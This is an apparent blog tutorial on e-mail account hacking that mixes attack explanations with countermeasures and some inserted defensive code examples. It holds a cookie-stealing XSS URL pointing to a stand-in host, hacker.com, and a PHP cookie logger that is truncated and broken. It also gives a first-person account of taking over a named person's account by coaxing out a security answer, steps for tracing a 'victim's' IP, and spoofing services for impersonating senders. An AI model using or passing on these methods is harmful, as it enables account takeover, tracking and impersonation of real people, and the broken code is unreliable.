Email Hacking explained - The Logical Kid

E-MAIL HACKING:

What is e-mail hacking?

You might have heard, people often complain that their e-mail id was hacked, and they have NO idea how that happened!
Well, the reasons are quite a few though!
There are only a few direct ways to hack any e-mail id.
As far as authentic HACKING of any e-mail id is concerned, that can be done ONLY by accessing the target’s e-mail server and grabbing the password from the database.

Seems simple?
Anyways, in real life.. you have got to be kidding if you go hack a mail server just to get one person’s e-mail password.
Even if you manage to get into the server, and assuming you also have access to the database, then what?
Negative! Even then.. cracking the password won’t be a cakewalk, as the passwords will be thoroughly encrypted using some very secure algorithms like MD5, SHA-1, or private encryptions!
You might have heard some security conscious techies always advising on using a strong password!
Strong password? What is that?
Yes! A strong password is one which contains a combination of lowercase and uppercase characters and special symbols, and has a length greater than 12 characters!
Trust me, this is the ONLY legitimate method of hacking any e-mail id.
Now, you do know that hacking any e-mail id using this so-called method is easier said than done!

Q: Yes, I got you.. but how do people still hack e-mail id(s)?
A: The basic concept of hacking e-mail id(s) is.. hacking a user’s mind!
In the case of e-mail hacking, this holds true.. as NOBODY uses the direct method of hacking!
So, how do people hack? This is proven here, that hackers use INDIRECT methods to hack your accounts!
Some of the most common methods are as follows:
  • Phishing
  • Keylogging
  • Session Hijacking by Cookie stealing
  • Tab nabbing
  • Social Engineering

More stuff with e-mail?

  • e-mail tracing
  • e-mail spoofing

I am going to explain the concepts behind the methods listed above for hacking any online account, and I am going to stress how they are used in e-mail hacking.




Phishing:

Phishing is the method of hacking in which the attacker/hacker creates a mirror page of the legitimate page of any website, and fools the user into thinking that it is the original website! When the user provides his/her credentials at that fake page, the credentials are logged on the hacker’s server, and then the user is re-directed to the genuine page with an “incorrect id/password” error which doesn’t even sound fishy to him!
He simply enters the credentials again, and lo! … he will be successfully logged into his account!
So far so good!
Now, do you think that the victim even had any idea of what just happened to him? No! He obviously wouldn’t bother to think about why he couldn’t log in on the first attempt!
Human psychology, it is! We often take things for granted, and overlook many events!
This vulnerability in human mind is exploited by this method of phishing!

Countermeasure(s) of Phishing:

  1. Never provide your credentials on any website which is NOT the legitimate website!
    Example: Never provide your yahoo! credentials at any other site which is not owned by yahoo!
    Genuine yahoo! link: http://www.yahoo.com
    Example sub-domains: http://mail.yahoo.com
                         http://xyz.yahoo.com
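
The check behind this countermeasure, as an added example (not code from the original post): it compares the host part of a link against the site's own domain, which is what separates mail.yahoo.com from a look-alike. The function names and the sample links are constructed for illustration.

```python
from urllib.parse import urlsplit

def belongs_to(url, legit_domain):
    """True only if the URL's host is legit_domain or one of its sub-domains."""
    try:
        # .hostname drops the scheme, any user:pass@ prefix, the port and the path
        host = urlsplit(url).hostname
    except ValueError:
        return False
    if not host:
        return False  # no scheme/host at all, nothing to trust
    host = host.rstrip(".").lower()
    legit = legit_domain.rstrip(".").lower()
    # Compare whole labels from the right: "notyahoo.com" must not match.
    return host == legit or host.endswith("." + legit)

# Constructed sample links (hypothetical, not real phishing URLs).
SAMPLES = [
    "http://mail.yahoo.com/inbox",              # genuine sub-domain
    "http://xyz.yahoo.com",                     # genuine sub-domain
    "http://yahoo.com.login.example.net/",      # legit name used as a prefix
    "http://www.yahoo.com@phish.example.net/",  # legit name in the userinfo part
    "http://notyahoo.com/",                     # legit name as a suffix of a label
    "http://yahoo.com.mailtracking.com/",       # same prefix trick
]

def classify(urls, legit_domain="yahoo.com"):
    """Map each URL to True (genuine) or False (look-alike)."""
    return {u: belongs_to(u, legit_domain) for u in urls}

if __name__ == "__main__":
    for url, ok in classify(SAMPLES).items():
        print("genuine  " if ok else "LOOKALIKE", url)
```

Only the first two sample links pass; in every other case the browser would connect to a host that yahoo! does not control, whatever the visible text of the link suggests.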




Keylogging:

Keylogging is the method of hacking in which the hacker logs all the keystrokes of the target’s system. This is done by sending a keylogger [program/software] to the target user via e-mail, or bound to a genuine application; when the user runs the seemingly genuine application, the keylogger engine starts in the background, hidden from Task Manager, and sends the keystroke logs to the hacker via a pre-configured e-mail delivery method or by direct upload to the hacker’s FTP server.
Now, if the user enters his e-mail username and password while the keylogger is running, his credentials will reach the attacker’s machine in plain text in a well decorated manner! (sorted HTML report)
Some of the most common software used in this module:
  • Ardamax Keylogger
  • BlazingTools Perfect Keylogger

Countermeasure(s) of Keylogging:

  • Use ‘on-screen keyboard’ (Virtual keyboard in Windows Operating System)
    [start > All Programs > Accessories > Ease of Access > On-Screen Keyboard]
  • Use a good Anti-Spyware




Session Hijacking by Cookie Stealing:

Cookies are data which websites basically use to identify whether the user is logged in!
Stealing cookies is the method of hacking in which the attacker carefully crafts a URL with a cookie stealing script and asks the target to go to that site.
When the innocent user goes to that URL, the script captures his cookies for the site from which he jumped to this malicious site!
The attacker then uses cookie-editors to morph/forge his cookies with those of the user, which results in session hijacking!
Session hijacking is the act of hijacking a user’s session as it is, with the limitation that the attacker is not able to change the password of the hijacked user’s account!
Anyways, this concept holds good in e-mail hacking too!
The attacker can play with the victim’s e-mail id, with the ONLY major limitation of not being able to change the password!
Basically, an attacker uses the concept of XSS (Cross Site Scripting) here, to get his job done!
Example:
http://www.genuinesite.com/index.php?site=www.hacker.com/stealcookie.php

The example code of a cookie stealer in PHP looks something like this:

<?php

$cookie = $_GET['c'];

$ip = getenv ('REMOTE_ADDR');

$date=date("j F, Y, g:i a");

$referer=getenv ('HTTP_REFERER');

$fp = fopen('file.txt', 'a');

fwrite($fp, 'Cookie: '.$cookie.'

IP: ' .$ip. '

Date and Time: ' .$date.
?>

Countermeasure(s) of Cookie Stealing:

  • Never click on any suspicious link, even if it appears to have come from a genuine source.
    Remember, TRUST is.. a weakness! If curiosity bothers you, open the link in a private/incognito window.
  • Use a good Internet Security Suite, like the one provided by Kaspersky Labs.
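
On the website's side, the script-based theft described above is limited by the attributes the server puts on the session cookie: a cookie marked HttpOnly cannot be read by page script at all. The following is an added example (not code from the original post) that audits Set-Cookie header values for the missing attributes; the cookie names and values are constructed.

```python
def audit_set_cookie(value):
    """Return (cookie_name, missing_attributes) for one Set-Cookie header value."""
    first, *rest = [part.strip() for part in value.split(";")]
    name = first.partition("=")[0]
    attrs = {}
    for part in rest:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip().lower()
    missing = []
    if "httponly" not in attrs:
        missing.append("HttpOnly")  # page script can read it via document.cookie
    if "secure" not in attrs:
        missing.append("Secure")    # also sent over unencrypted http
    if attrs.get("samesite") not in ("lax", "strict"):
        missing.append("SameSite")  # absent or None: attached to cross-site requests
    return name, missing

# Constructed Set-Cookie values, as a login response might send them.
SAMPLE = [
    "SID=31d4d96e407aad42; Path=/",
    "SID=31d4d96e407aad42; Path=/; Secure; HttpOnly; SameSite=Lax",
    "theme=dark; Path=/; SameSite=None; Secure",
]

def weak_cookies(values):
    """Keep only the cookies that are missing at least one attribute."""
    return [(n, m) for n, m in map(audit_set_cookie, values) if m]

if __name__ == "__main__":
    for name, missing in weak_cookies(SAMPLE):
        print(f"{name}: missing {', '.join(missing)}")
```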




Tab nabbing:

Ever logged into some page of a site and moved to another tab of your browser for some work.. and when you came back to the previous tab, you found that it’s a different page!?
Experienced such an activity? Thinking that it was just a hallucination? No! Probably you were a victim of a tab-nabbing type of attack and you never noticed!
Yes! This particular scenario of attack is called Tab-Nabbing (logically, a concatenation of the words ‘tab’ [as in browser] & ‘nab’ [as in grab]).
The process is called Tab-nabbing!
The concept involved in this is that an attacker posts a JavaScript with tags like <body OnLoad> which tends to load a new page in the same window after a period of time.
So, when we switch to some other tab, and return after some time to the previous tab, we may find that the page is different from the one we had left open!

Countermeasure(s) of tab nabbing:

  • Think no further, just close the tab (or) re-enter the genuine URL of the page you want and provide your credentials there!
  • To prevent such attacks, some websites log you off the session when found inactive for 15 minutes or so, so that any malicious tab-nabbing script may not bother you!

Let’s move on to hacking without any tools!
Hacking without any tools, or let me say just by using some communication skills.. is also possible!
As far as the success rate is concerned, this is very successful and the best part is, it is not illegal!
Yes! I am talking about Social Engineering.




Social Engineering:

Social engineering is the art of hacking by just using our communication skills!
Don’t get it? Uhm.. okay, let me explain it in a generalised way!

Scenario:

I happened to try some user Maya’s e-mail account hacking via password recovery process using secret questions.
Her first question was “Where were you born?” and I could crack this question by her facebook profile where she had put her hometown as ‘Nagpur’. Bingo! This worked out!
Now, I just needed to answer one more question and I would be then asked to enter a new password, and that would be a successful hack!
Coming to the second question.. well, this was kind of difficult for me, as it was “What was my first pet’s name?”
I didn’t know Maya personally, so cracking this question was a bit difficult for me.
After looking at her facebook profile for long, checking the ‘pages’, ‘interests’ & ‘activities’ she LIKED, I couldn’t get positive results, as I only knew that she had a dog.. through some mutual friend.
What was the dog’s name.. is what remained a question for me though!
I just started a facebook chat with Maya and asked her some general questions; the trimmed conversation was something like the one below:
Me: How are you! Long time no chat!?
Maya: Hi! I’m fine! How are you??
Me: [blah...blah..blah, and after getting comfortable at a level, threw a question to her] “You love animals a lot rite?” 
Maya: Yes! I love them a lot! <3

Now I thought it was a good moment to shoot a question asking her dog’s name,
and I just asked, “Hey.. can you tell me the price of a labrador these days?” to which she replied:
“Its around 12-15 thousand!”
Me: Wow! Thats cool! How much was your lab? :)
Maya: My Sandy was 10k when we bought it! :)

Voila! I got the name of her labrador! :D
Next is what.. I just entered ‘Sandy’ as an answer to the second security question, and bingo! This was the right answer! :D
I gave a new password, and then the process of HACKING was complete!
Was it any harder? Obviously NO! ;)
Well, this was just one scenario… but the concept is same in all Social Engineering attacks! The human nature of TRUSTING anyone and everyone and disclosing personal information, is eXploited in this particular module of attack!




e-mail tracing:

Have you ever heard that people trace your IP via e-mail?
Yes! This happens! This can be done by checking the e-mail headers of the e-mail received.
Anyways, if we purposefully want to capture the IP of a person.. we can send carefully crafted JavaScript code embedded in the e-mail content, which holds the script to capture the IP address of the person opening it!
There are also some sites which offer this service, without the need for the sender to embed the IP-capture script!
Sites like mailtracking[dot]com and statcounter[dot]com offer us IP-tracing service(s) for free!

Steps to trace the IP of a yahoo mail user using mailtracking[dot]com:

  1. Create an account at mailtracking[dot]com in association with yahoo[dot]com
  2. Log into your yahoo! mail account
  3. Click on ‘compose’
  4. Write some content & move to the ‘send to’ field
  5. Enter victim@yahoo.com.mailtracking.com
  6. When the user with e-mail id victim@yahoo.com opens the mail we just sent him, we will get a notification on our yahoo! mail containing the IP-address of the victim and many more details.. like his Operating System, browser, etc.

Currently these services are being bounced by yahoo and gmail, but anyways you may try using the "embed pixel" option offered on the above website to counter for the same.




Anonymous e-mail (and/or) e-mail spoofing:

Sometimes you want to send a mail to anyone but do not want to be traced? The solution is simple!
This can be done by the concept of anonymous e-mailing. You can send an anonymous e-mail using an smtp server of your own, like ‘hMailServer’ , ‘smtpserverwin’ and many more software available for free download!
Anyways, you can easily use the online service too which is far easier than manually setting up your own smtp server.
Some of the most common anonymous e-mail sending services are offered by:
  1. fakesend[dot]com
  2. fakemailgenerator[dot]com
  3. sendanonymousemail[dot]net
  4. deadfake[dot]com/send.aspx
  5. mail[dot]anonymizer[dot]name
Well, the above websites give you liberty to send anonymous and/or spoofed mail to any e-mail account!
You can even send as ‘billgates@microsoft.com’ ;)
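
What the recipient of such a mail can check, and the header reading mentioned under e-mail tracing: an added example (not code from the original post) that walks the Received chain of a message and reads the verdicts the receiving server recorded in Authentication-Results. The message, host names and addresses are constructed; the IPs come from the RFC 5737 documentation ranges.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed message: hosts use .example, IPs are RFC 5737 documentation ranges.
RAW = """\
Received: from mx.recipient.example (mx.recipient.example [198.51.100.7])
\tby inbox.recipient.example; Mon, 1 Jan 2024 10:00:02 +0000
Received: from webform.example (unknown [203.0.113.45])
\tby mx.recipient.example; Mon, 1 Jan 2024 10:00:01 +0000
Authentication-Results: mx.recipient.example;
\tspf=fail smtp.mailfrom=bigcorp.example;
\tdkim=none; dmarc=fail header.from=bigcorp.example
From: The Boss <ceo@bigcorp.example>
To: you@recipient.example
Subject: hello

body
"""

BRACKETED_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
VERDICT = re.compile(r"\b(spf|dkim|dmarc)=(\w+)")

def analyse(raw):
    msg = message_from_string(raw)
    # Every relay prepends its own Received line, so the list reads newest
    # first and the last entry is the hop closest to the sender. Only lines
    # written by servers you trust are reliable; older ones can be forged.
    hops = []
    for line in msg.get_all("Received", []):
        match = BRACKETED_IP.search(line)
        hops.append(match.group(1) if match else None)
    # Verdicts recorded by the receiving server after its SPF/DKIM/DMARC checks.
    verdicts = dict(VERDICT.findall(msg.get("Authentication-Results", "")))
    address = parseaddr(msg.get("From", ""))[1]
    return {
        "from_domain": address.rpartition("@")[2].lower(),
        "hops": hops,
        "origin_ip": hops[-1] if hops else None,
        "verdicts": verdicts,
        # No DMARC pass means the From: domain was not authenticated.
        "from_unauthenticated": verdicts.get("dmarc") != "pass",
    }

if __name__ == "__main__":
    for key, value in analyse(RAW).items():
        print(f"{key}: {value}")
```

For the sample, the display name and From: address look official, but the message entered the recipient's mail server from 203.0.113.45 and failed both SPF and DMARC for the domain it claims.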
Now, suppose you want to dispose of your mail id to prevent tracking; there are many other sites which provide this specific service:
  1. 10minutemail[dot]com
  2. mailinator[dot]com
  3. tittbit[dot]in
  4. guerillamail[dot]com
  5. mytrashmail[dot]com
  6. yopmail[dot]com
The concept is simple. They provide you a temporary e-mail account which is automatically disposed of after a period of time, say 10 minutes or an hour, or even one day!
These e-mail services can be used when you need to specify an e-mail id for receiving a download link of any software!
People, most of the wannabe hackers think that hacking is MAGIC! But wait.. NO! This isn’t any magic. This is purely based on logic! If you want to become a hacker, just remove all false thoughts in your mind about hacking that it is all magic.. et al!
Work towards the concept of each module, and understand the logic better! :)
That’s all folks!
Will come up with much more stuff like this in the next post! Until then, stay safe.. and happy hacking!

- itsmeRiF